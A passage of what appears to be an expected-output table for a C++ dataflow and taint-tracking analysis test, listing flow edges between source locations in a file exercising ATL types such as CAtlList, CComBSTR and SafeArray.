atl.cpp:346:3:346:3 | list | | +| atl.cpp:303:25:303:26 | 10 | atl.cpp:303:25:303:27 | call to CAtlList | TAINT | +| atl.cpp:303:25:303:27 | call to CAtlList | atl.cpp:304:5:304:9 | list2 | | +| atl.cpp:303:25:303:27 | call to CAtlList | atl.cpp:305:10:305:14 | list2 | | +| atl.cpp:303:25:303:27 | call to CAtlList | atl.cpp:346:3:346:3 | list2 | | +| atl.cpp:304:5:304:9 | ref arg list2 | atl.cpp:305:10:305:14 | list2 | | +| atl.cpp:304:5:304:9 | ref arg list2 | atl.cpp:346:3:346:3 | list2 | | +| atl.cpp:304:24:304:27 | list | atl.cpp:304:23:304:27 | & ... | | +| atl.cpp:305:10:305:14 | ref arg list2 | atl.cpp:346:3:346:3 | list2 | | +| atl.cpp:307:25:307:26 | 10 | atl.cpp:307:25:307:27 | call to CAtlList | TAINT | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:308:5:308:9 | list3 | | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:309:10:309:14 | list3 | | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:312:24:312:28 | list3 | | +| atl.cpp:307:25:307:27 | call to CAtlList | atl.cpp:346:3:346:3 | list3 | | +| atl.cpp:308:5:308:9 | ref arg list3 | atl.cpp:309:10:309:14 | list3 | | +| atl.cpp:308:5:308:9 | ref arg list3 | atl.cpp:312:24:312:28 | list3 | | +| atl.cpp:308:5:308:9 | ref arg list3 | atl.cpp:346:3:346:3 | list3 | | +| atl.cpp:309:10:309:14 | ref arg list3 | atl.cpp:312:24:312:28 | list3 | | +| atl.cpp:309:10:309:14 | ref arg list3 | atl.cpp:346:3:346:3 | list3 | | +| atl.cpp:311:25:311:26 | 10 | atl.cpp:311:25:311:27 | call to CAtlList | TAINT | +| atl.cpp:311:25:311:27 | call to CAtlList | atl.cpp:312:5:312:9 | list4 | | +| atl.cpp:311:25:311:27 | call to CAtlList | atl.cpp:313:10:313:14 | list4 | | +| atl.cpp:311:25:311:27 | call to CAtlList | atl.cpp:346:3:346:3 | list4 | | +| atl.cpp:312:5:312:9 | ref arg list4 | atl.cpp:313:10:313:14 | list4 | | +| atl.cpp:312:5:312:9 | ref arg list4 | atl.cpp:346:3:346:3 | list4 | | +| atl.cpp:312:24:312:28 | list3 | atl.cpp:312:23:312:28 | & ... 
| | +| atl.cpp:313:10:313:14 | ref arg list4 | atl.cpp:346:3:346:3 | list4 | | +| atl.cpp:316:27:316:28 | 10 | atl.cpp:316:27:316:29 | call to CAtlList | TAINT | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:317:18:317:22 | list5 | | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:317:32:317:36 | list5 | | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:318:12:318:16 | list5 | | +| atl.cpp:316:27:316:29 | call to CAtlList | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:317:18:317:22 | ref arg list5 | atl.cpp:318:12:318:16 | list5 | | +| atl.cpp:317:18:317:22 | ref arg list5 | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:317:24:317:27 | call to Find | atl.cpp:318:24:318:26 | pos | | +| atl.cpp:317:32:317:36 | ref arg list5 | atl.cpp:317:18:317:22 | list5 | | +| atl.cpp:317:32:317:36 | ref arg list5 | atl.cpp:318:12:318:16 | list5 | | +| atl.cpp:317:32:317:36 | ref arg list5 | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:318:12:318:16 | ref arg list5 | atl.cpp:319:5:319:5 | list5 | | +| atl.cpp:322:27:322:28 | 10 | atl.cpp:322:27:322:29 | call to CAtlList | TAINT | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:323:7:323:11 | list6 | | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:324:18:324:22 | list6 | | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:325:12:325:16 | list6 | | +| atl.cpp:322:27:322:29 | call to CAtlList | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:323:7:323:11 | ref arg list6 | atl.cpp:324:18:324:22 | list6 | | +| atl.cpp:323:7:323:11 | ref arg list6 | atl.cpp:325:12:325:16 | list6 | | +| atl.cpp:323:7:323:11 | ref arg list6 | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:324:18:324:22 | ref arg list6 | atl.cpp:325:12:325:16 | list6 | | +| atl.cpp:324:18:324:22 | ref arg list6 | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:324:24:324:32 | call to FindIndex | atl.cpp:325:24:325:26 | pos | | +| atl.cpp:325:12:325:16 | ref arg list6 | atl.cpp:326:5:326:5 | list6 | | +| atl.cpp:329:27:329:28 | 10 | atl.cpp:329:27:329:29 | 
call to CAtlList | TAINT | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:330:18:330:22 | list7 | | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:331:7:331:11 | list7 | | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:332:12:332:16 | list7 | | +| atl.cpp:329:27:329:29 | call to CAtlList | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:330:18:330:22 | ref arg list7 | atl.cpp:331:7:331:11 | list7 | | +| atl.cpp:330:18:330:22 | ref arg list7 | atl.cpp:332:12:332:16 | list7 | | +| atl.cpp:330:18:330:22 | ref arg list7 | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:330:24:330:38 | call to GetTailPosition | atl.cpp:331:25:331:27 | pos | | +| atl.cpp:331:7:331:11 | ref arg list7 | atl.cpp:332:12:332:16 | list7 | | +| atl.cpp:331:7:331:11 | ref arg list7 | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:332:12:332:16 | ref arg list7 | atl.cpp:333:5:333:5 | list7 | | +| atl.cpp:336:27:336:28 | 10 | atl.cpp:336:27:336:29 | call to CAtlList | TAINT | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:337:18:337:22 | list8 | | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:338:7:338:11 | list8 | | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:339:12:339:16 | list8 | | +| atl.cpp:336:27:336:29 | call to CAtlList | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:337:18:337:22 | ref arg list8 | atl.cpp:338:7:338:11 | list8 | | +| atl.cpp:337:18:337:22 | ref arg list8 | atl.cpp:339:12:339:16 | list8 | | +| atl.cpp:337:18:337:22 | ref arg list8 | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:337:24:337:38 | call to GetTailPosition | atl.cpp:338:26:338:28 | pos | | +| atl.cpp:338:7:338:11 | ref arg list8 | atl.cpp:339:12:339:16 | list8 | | +| atl.cpp:338:7:338:11 | ref arg list8 | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:339:12:339:16 | ref arg list8 | atl.cpp:340:5:340:5 | list8 | | +| atl.cpp:342:27:342:28 | 10 | atl.cpp:342:27:342:29 | call to CAtlList | TAINT | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:343:7:343:11 | list9 | | +| 
atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:343:19:343:23 | list9 | | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:344:12:344:16 | list9 | | +| atl.cpp:342:27:342:29 | call to CAtlList | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:343:7:343:11 | ref arg list9 | atl.cpp:344:12:344:16 | list9 | | +| atl.cpp:343:7:343:11 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:343:7:343:11 | list9 | | +| atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:344:12:344:16 | list9 | | +| atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:344:12:344:16 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | +| atl.cpp:350:24:350:25 | 10 | atl.cpp:350:24:350:26 | call to CAtlList | TAINT | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:351:10:351:13 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:352:5:352:8 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:353:10:353:13 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:356:24:356:27 | list | | +| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:398:3:398:3 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:352:5:352:8 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:353:10:353:13 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:356:24:356:27 | list | | +| atl.cpp:351:10:351:13 | ref arg list | atl.cpp:398:3:398:3 | list | | +| atl.cpp:352:5:352:8 | ref arg list | atl.cpp:353:10:353:13 | list | | +| atl.cpp:352:5:352:8 | ref arg list | atl.cpp:356:24:356:27 | list | | +| atl.cpp:352:5:352:8 | ref arg list | atl.cpp:398:3:398:3 | list | | +| atl.cpp:353:10:353:13 | ref arg list | atl.cpp:356:24:356:27 | list | | +| atl.cpp:353:10:353:13 | ref arg list | atl.cpp:398:3:398:3 | list | | +| atl.cpp:355:25:355:26 | 10 | atl.cpp:355:25:355:27 | call to CAtlList | TAINT | +| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:356:5:356:9 | list2 | | +| 
atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:357:10:357:14 | list2 | | +| atl.cpp:355:25:355:27 | call to CAtlList | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:357:10:357:14 | list2 | | +| atl.cpp:356:5:356:9 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:356:24:356:27 | list | atl.cpp:356:23:356:27 | & ... | | +| atl.cpp:357:10:357:14 | ref arg list2 | atl.cpp:398:3:398:3 | list2 | | +| atl.cpp:359:25:359:26 | 10 | atl.cpp:359:25:359:27 | call to CAtlList | TAINT | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:360:5:360:9 | list3 | | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:361:10:361:14 | list3 | | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:359:25:359:27 | call to CAtlList | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:361:10:361:14 | list3 | | +| atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:360:5:360:9 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:364:24:364:28 | list3 | | +| atl.cpp:361:10:361:14 | ref arg list3 | atl.cpp:398:3:398:3 | list3 | | +| atl.cpp:363:25:363:26 | 10 | atl.cpp:363:25:363:27 | call to CAtlList | TAINT | +| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:364:5:364:9 | list4 | | +| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:365:10:365:14 | list4 | | +| atl.cpp:363:25:363:27 | call to CAtlList | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:365:10:365:14 | list4 | | +| atl.cpp:364:5:364:9 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:364:24:364:28 | list3 | atl.cpp:364:23:364:28 | & ... 
| | +| atl.cpp:365:10:365:14 | ref arg list4 | atl.cpp:398:3:398:3 | list4 | | +| atl.cpp:368:27:368:28 | 10 | atl.cpp:368:27:368:29 | call to CAtlList | TAINT | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:18:369:22 | list5 | | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:369:32:369:36 | list5 | | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:368:27:368:29 | call to CAtlList | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:369:18:369:22 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:369:24:369:27 | call to Find | atl.cpp:370:24:370:26 | pos | | +| atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:369:18:369:22 | list5 | | +| atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:370:12:370:16 | list5 | | +| atl.cpp:369:32:369:36 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:370:12:370:16 | ref arg list5 | atl.cpp:371:5:371:5 | list5 | | +| atl.cpp:374:27:374:28 | 10 | atl.cpp:374:27:374:29 | call to CAtlList | TAINT | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:375:7:375:11 | list6 | | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:376:18:376:22 | list6 | | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:374:27:374:29 | call to CAtlList | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:376:18:376:22 | list6 | | +| atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:375:7:375:11 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:376:18:376:22 | ref arg list6 | atl.cpp:377:12:377:16 | list6 | | +| atl.cpp:376:18:376:22 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:376:24:376:32 | call to FindIndex | atl.cpp:377:24:377:26 | pos | | +| atl.cpp:377:12:377:16 | ref arg list6 | atl.cpp:378:5:378:5 | list6 | | +| atl.cpp:381:27:381:28 | 10 | atl.cpp:381:27:381:29 | 
call to CAtlList | TAINT | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:382:18:382:22 | list7 | | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:383:7:383:11 | list7 | | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:381:27:381:29 | call to CAtlList | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:383:7:383:11 | list7 | | +| atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:382:18:382:22 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:382:24:382:38 | call to GetTailPosition | atl.cpp:383:25:383:27 | pos | | +| atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:384:12:384:16 | list7 | | +| atl.cpp:383:7:383:11 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:384:12:384:16 | ref arg list7 | atl.cpp:385:5:385:5 | list7 | | +| atl.cpp:388:27:388:28 | 10 | atl.cpp:388:27:388:29 | call to CAtlList | TAINT | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:389:18:389:22 | list8 | | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:390:7:390:11 | list8 | | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:388:27:388:29 | call to CAtlList | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:390:7:390:11 | list8 | | +| atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:389:18:389:22 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:389:24:389:38 | call to GetTailPosition | atl.cpp:390:26:390:28 | pos | | +| atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:391:12:391:16 | list8 | | +| atl.cpp:390:7:390:11 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:391:12:391:16 | ref arg list8 | atl.cpp:392:5:392:5 | list8 | | +| atl.cpp:394:27:394:28 | 10 | atl.cpp:394:27:394:29 | call to CAtlList | TAINT | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:7:395:11 | list9 | | +| 
atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:395:19:395:23 | list9 | | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:394:27:394:29 | call to CAtlList | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:395:7:395:11 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:395:7:395:11 | list9 | | +| atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:396:12:396:16 | list9 | | +| atl.cpp:395:19:395:23 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:396:12:396:16 | ref arg list9 | atl.cpp:397:5:397:5 | list9 | | +| atl.cpp:454:21:454:33 | new | atl.cpp:455:3:455:6 | safe | | +| atl.cpp:454:21:454:33 | new | atl.cpp:456:10:456:13 | safe | | +| atl.cpp:455:3:455:6 | safe [post update] | atl.cpp:456:10:456:13 | safe | | +| atl.cpp:455:3:455:40 | ... = ... | atl.cpp:455:9:455:14 | pvData [post update] | | +| atl.cpp:455:18:455:38 | call to indirect_source | atl.cpp:455:3:455:40 | ... = ... 
| | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:462:16:462:16 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:469:20:469:20 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:473:16:473:16 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:481:11:481:11 | x | | +| atl.cpp:460:13:460:33 | call to indirect_source | atl.cpp:495:20:495:20 | x | | +| atl.cpp:462:16:462:16 | x | atl.cpp:462:16:462:17 | call to CComBSTR | TAINT | +| atl.cpp:462:16:462:17 | call to CComBSTR | atl.cpp:463:10:463:10 | b | | +| atl.cpp:462:16:462:17 | call to CComBSTR | atl.cpp:465:17:465:17 | b | | +| atl.cpp:462:16:462:17 | call to CComBSTR | atl.cpp:467:3:467:3 | b | | +| atl.cpp:463:10:463:10 | b [post update] | atl.cpp:465:17:465:17 | b | | +| atl.cpp:463:10:463:10 | b [post update] | atl.cpp:467:3:467:3 | b | | +| atl.cpp:463:12:463:16 | ref arg m_str | atl.cpp:466:13:466:17 | m_str | | +| atl.cpp:465:17:465:17 | b | atl.cpp:465:17:465:18 | call to CComBSTR | | +| atl.cpp:465:17:465:18 | call to CComBSTR | atl.cpp:466:10:466:11 | b2 | | +| atl.cpp:465:17:465:18 | call to CComBSTR | atl.cpp:467:3:467:3 | b2 | | +| atl.cpp:466:10:466:11 | b2 [post update] | atl.cpp:467:3:467:3 | b2 | | +| atl.cpp:469:16:469:21 | call to CComBSTR | atl.cpp:470:10:470:10 | b | | +| atl.cpp:469:16:469:21 | call to CComBSTR | atl.cpp:471:3:471:3 | b | | +| atl.cpp:470:10:470:10 | b [post update] | atl.cpp:471:3:471:3 | b | | +| atl.cpp:473:16:473:16 | x | atl.cpp:473:16:473:17 | call to CComBSTR | TAINT | +| atl.cpp:473:16:473:17 | call to CComBSTR | atl.cpp:477:11:477:11 | b | | +| atl.cpp:473:16:473:17 | call to CComBSTR | atl.cpp:513:3:513:3 | b | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:476:10:476:11 | b2 | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:477:5:477:6 | b2 | | +| atl.cpp:475:14:475:15 | call to CComBSTR | atl.cpp:478:10:478:11 | b2 | | +| atl.cpp:475:14:475:15 | call to CComBSTR | 
atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:476:10:476:11 | b2 [post update] | atl.cpp:477:5:477:6 | b2 | | +| atl.cpp:476:10:476:11 | b2 [post update] | atl.cpp:478:10:478:11 | b2 | | +| atl.cpp:476:10:476:11 | b2 [post update] | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:476:13:476:17 | ref arg m_str | atl.cpp:478:13:478:17 | m_str | | +| atl.cpp:477:5:477:6 | ref arg b2 | atl.cpp:478:10:478:11 | b2 | | +| atl.cpp:477:5:477:6 | ref arg b2 | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:478:10:478:11 | b2 [post update] | atl.cpp:513:3:513:3 | b2 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:481:5:481:6 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:482:10:482:11 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:483:28:483:29 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:480:14:480:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:482:10:482:11 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:483:28:483:29 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:481:5:481:6 | ref arg b3 | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:481:11:481:11 | x | atl.cpp:481:11:481:11 | call to CComBSTR | TAINT | +| atl.cpp:482:10:482:11 | b3 [post update] | atl.cpp:483:28:483:29 | b3 | | +| atl.cpp:482:10:482:11 | b3 [post update] | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:482:10:482:11 | b3 [post update] | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:483:28:483:29 | ref arg b3 | atl.cpp:484:13:484:14 | b3 | | +| atl.cpp:483:28:483:29 | ref arg b3 | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:484:11:484:14 | * ... | atl.cpp:484:10:484:14 | * ... | TAINT | +| atl.cpp:484:12:484:12 | call to operator& | atl.cpp:484:11:484:14 | * ... 
| TAINT | +| atl.cpp:484:13:484:14 | ref arg b3 | atl.cpp:513:3:513:3 | b3 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:487:5:487:6 | b4 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:488:10:488:11 | b4 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:491:19:491:20 | b4 | | +| atl.cpp:486:14:486:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:487:5:487:6 | ref arg b4 | atl.cpp:488:10:488:11 | b4 | | +| atl.cpp:487:5:487:6 | ref arg b4 | atl.cpp:491:19:491:20 | b4 | | +| atl.cpp:487:5:487:6 | ref arg b4 | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:488:10:488:11 | b4 [post update] | atl.cpp:491:19:491:20 | b4 | | +| atl.cpp:488:10:488:11 | b4 [post update] | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:488:13:488:17 | ref arg m_str | atl.cpp:491:22:491:26 | m_str | | +| atl.cpp:490:14:490:15 | call to CComBSTR | atl.cpp:491:5:491:6 | b5 | | +| atl.cpp:490:14:490:15 | call to CComBSTR | atl.cpp:492:10:492:11 | b5 | | +| atl.cpp:490:14:490:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b5 | | +| atl.cpp:491:5:491:6 | ref arg b5 | atl.cpp:492:10:492:11 | b5 | | +| atl.cpp:491:5:491:6 | ref arg b5 | atl.cpp:513:3:513:3 | b5 | | +| atl.cpp:491:19:491:20 | b4 [post update] | atl.cpp:513:3:513:3 | b4 | | +| atl.cpp:492:10:492:11 | b5 [post update] | atl.cpp:513:3:513:3 | b5 | | +| atl.cpp:494:14:494:15 | call to CComBSTR | atl.cpp:495:5:495:6 | b6 | | +| atl.cpp:494:14:494:15 | call to CComBSTR | atl.cpp:496:10:496:11 | b6 | | +| atl.cpp:494:14:494:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b6 | | +| atl.cpp:495:5:495:6 | ref arg b6 | atl.cpp:496:10:496:11 | b6 | | +| atl.cpp:495:5:495:6 | ref arg b6 | atl.cpp:513:3:513:3 | b6 | | +| atl.cpp:496:10:496:11 | b6 [post update] | atl.cpp:513:3:513:3 | b6 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:499:5:499:6 | b7 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:500:10:500:11 | b7 | | +| atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:503:19:503:20 | b7 | | +| 
atl.cpp:498:14:498:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:499:5:499:6 | ref arg b7 | atl.cpp:500:10:500:11 | b7 | | +| atl.cpp:499:5:499:6 | ref arg b7 | atl.cpp:503:19:503:20 | b7 | | +| atl.cpp:499:5:499:6 | ref arg b7 | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:500:10:500:11 | b7 [post update] | atl.cpp:503:19:503:20 | b7 | | +| atl.cpp:500:10:500:11 | b7 [post update] | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:500:13:500:17 | ref arg m_str | atl.cpp:503:22:503:26 | m_str | | +| atl.cpp:502:14:502:15 | call to CComBSTR | atl.cpp:503:5:503:6 | b8 | | +| atl.cpp:502:14:502:15 | call to CComBSTR | atl.cpp:504:10:504:11 | b8 | | +| atl.cpp:502:14:502:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b8 | | +| atl.cpp:503:5:503:6 | ref arg b8 | atl.cpp:504:10:504:11 | b8 | | +| atl.cpp:503:5:503:6 | ref arg b8 | atl.cpp:513:3:513:3 | b8 | | +| atl.cpp:503:19:503:20 | b7 [post update] | atl.cpp:513:3:513:3 | b7 | | +| atl.cpp:504:10:504:11 | b8 [post update] | atl.cpp:513:3:513:3 | b8 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:508:5:508:6 | b9 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:509:5:509:6 | b9 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:512:10:512:11 | b9 | | +| atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:507:15:507:18 | safe | atl.cpp:509:21:509:24 | safe | | +| atl.cpp:507:15:507:18 | safe | atl.cpp:510:10:510:13 | safe | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:509:5:509:6 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:10:512:11 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:512:10:512:11 | b9 | | +| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:509:20:509:24 | ref arg & ... | atl.cpp:509:21:509:24 | safe [inner post update] | | +| atl.cpp:509:20:509:24 | ref arg & ... 
| atl.cpp:510:10:510:13 | safe | | +| atl.cpp:509:21:509:24 | safe | atl.cpp:509:20:509:24 | & ... | | +| atl.cpp:512:10:512:11 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | +| atl.cpp:515:16:515:39 | call to indirect_source | atl.cpp:517:16:517:16 | w | | +| atl.cpp:515:16:515:39 | call to indirect_source | atl.cpp:521:15:521:15 | w | | +| atl.cpp:515:16:515:39 | call to indirect_source | atl.cpp:525:20:525:20 | w | | +| atl.cpp:517:16:517:16 | ref arg w | atl.cpp:521:15:521:15 | w | | +| atl.cpp:517:16:517:16 | ref arg w | atl.cpp:525:20:525:20 | w | | +| atl.cpp:517:16:517:16 | w | atl.cpp:517:16:517:17 | call to CComBSTR | TAINT | +| atl.cpp:517:16:517:17 | call to CComBSTR | atl.cpp:518:10:518:10 | b | | +| atl.cpp:517:16:517:17 | call to CComBSTR | atl.cpp:523:3:523:3 | b | | +| atl.cpp:518:10:518:10 | b [post update] | atl.cpp:523:3:523:3 | b | | +| atl.cpp:520:14:520:15 | call to CComBSTR | atl.cpp:521:5:521:6 | b2 | | +| atl.cpp:520:14:520:15 | call to CComBSTR | atl.cpp:522:10:522:11 | b2 | | +| atl.cpp:520:14:520:15 | call to CComBSTR | atl.cpp:523:3:523:3 | b2 | | +| atl.cpp:521:5:521:6 | ref arg b2 | atl.cpp:522:10:522:11 | b2 | | +| atl.cpp:521:5:521:6 | ref arg b2 | atl.cpp:523:3:523:3 | b2 | | +| atl.cpp:521:15:521:15 | ref arg w | atl.cpp:525:20:525:20 | w | | +| atl.cpp:522:10:522:11 | b2 [post update] | atl.cpp:523:3:523:3 | b2 | | +| atl.cpp:525:16:525:21 | call to CComBSTR | atl.cpp:526:10:526:10 | b | | +| atl.cpp:525:16:525:21 | call to CComBSTR | atl.cpp:527:3:527:3 | b | | +| atl.cpp:526:10:526:10 | b [post update] | atl.cpp:527:3:527:3 | b | | +| atl.cpp:572:22:572:33 | call to getSafeArray | atl.cpp:573:8:573:11 | safe | | +| atl.cpp:572:22:572:33 | call to getSafeArray | atl.cpp:575:24:575:27 | safe | | +| atl.cpp:572:22:572:33 | call to getSafeArray | atl.cpp:586:11:586:14 | safe | | +| atl.cpp:573:8:573:11 | safe [post update] | atl.cpp:575:24:575:27 | safe | | +| 